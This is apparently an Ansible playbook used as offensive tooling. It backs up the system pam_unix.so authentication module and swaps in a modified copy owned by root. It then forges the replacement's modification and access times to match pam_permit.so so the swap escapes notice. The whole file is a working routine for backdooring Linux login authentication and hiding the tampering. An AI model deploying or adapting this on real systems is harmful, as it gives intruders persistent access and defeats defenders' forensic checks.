---
- name: Check if deploy has been run before and backup exists
  ansible.builtin.stat:
    path: /usr/lib/pam.d/pam_unix.so
  register: mod_exist

- name: Backup old pam_unix.so
  ansible.builtin.copy:
    src: /usr/lib/x86_64-linux-gnu/security/pam_unix.so
    dest: /usr/lib/pam.d/
    remote_src: yes
  when: not mod_exist.stat.exists

- name: Copy over modified pam_unix.so
  ansible.builtin.copy:
    src: pam_unix.so
    dest: /usr/lib/x86_64-linux-gnu/security/pam_unix.so
    owner: root
    group: root
    mode: 0644
  check_mode: false

- name: Get timestamps of other PAM modules
  ansible.builtin.stat:
    path: /usr/lib/x86_64-linux-gnu/security/pam_permit.so
  register: pam_stat

- name: Timestomp new pam_unix.so
  ansible.builtin.file:
    path: /usr/lib/x86_64-linux-gnu/security/pam_unix.so
    modification_time: '{{ pam_mod_time }}'
    access_time: '{{ pam_access_time }}'
  vars:
    pam_mod_time: '{{ "%Y%m%d%H%M.%S" | strftime(pam_stat.stat.mtime) }}'
    pam_access_time: '{{ "%Y%m%d%H%M.%S" | strftime(pam_stat.stat.atime) }}'

